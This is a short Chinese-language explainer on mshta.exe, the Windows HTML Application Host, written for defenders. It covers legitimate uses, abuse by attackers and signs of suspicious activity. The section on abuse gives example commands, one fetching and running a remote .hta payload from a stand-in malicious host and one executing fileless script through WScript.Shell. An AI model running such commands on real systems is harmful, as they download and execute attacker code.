利用微软的 HTML 应用程序宿主程序的攻击

mshta.exe 是微软的 HTML 应用程序宿主程序（Microsoft HTML Application Host），属于 Windows 系统组件。它的核心功能是运行 .hta（HTML Application）文件，允许通过 HTML、JavaScript、VBScript 等技术创建交互式图形界面应用。

---

何时会调用 mshta.exe？

1. 合法用途

• 运行本地/企业级 HTA 应用：
  • 企业可能用 .hta 开发内部工具（如配置向导、管理界面）。
  • 示例命令：mshta.exe C:\tools\config.hta
• 执行系统脚本：
  • 通过命令行调用 JavaScript/VBScript（无需保存为文件）。
  • 示例：

    mshta.exe "javascript:alert('Hello World');close()"
    

2. 潜在恶意用途（需警惕）

• 绕过安全防护：
  • 攻击者可能通过 mshta.exe 执行远程恶意脚本（如下载木马、提权）。
  • 示例：

    mshta.exe "http://malicious.site/payload.hta"
    

• 无文件攻击：
  • 直接在内存中执行代码，不写入磁盘。
  • 示例：

    mshta.exe "javascript:new ActiveXObject('WScript.Shell').Run('calc.exe')"
    

• 伪装进程：
  • 恶意进程可能命名为 mshta.exe 以混淆检测（需检查文件路径是否合法）。

---

如何识别可疑行为？

1. 检查命令行参数：

   • 合法场景通常指向本地 .hta 文件或简单脚本。
   • 可疑场景可能包含：
     • 远程 URL（如 http://、\\192.168.x.x）。
     • 长串混淆的 JavaScript/VBScript 代码。
     • 敏感命令（如下载文件、启动 PowerShell 等）。

2. 验证文件路径：

   • 合法 mshta.exe 路径为 C:\Windows\System32\mshta.exe。
   • 其他路径（如临时目录）可能是恶意文件。

3. 监控进程上下文：

   • 若 mshta.exe 在非交互式场景（如计划任务、启动项）运行，需警惕。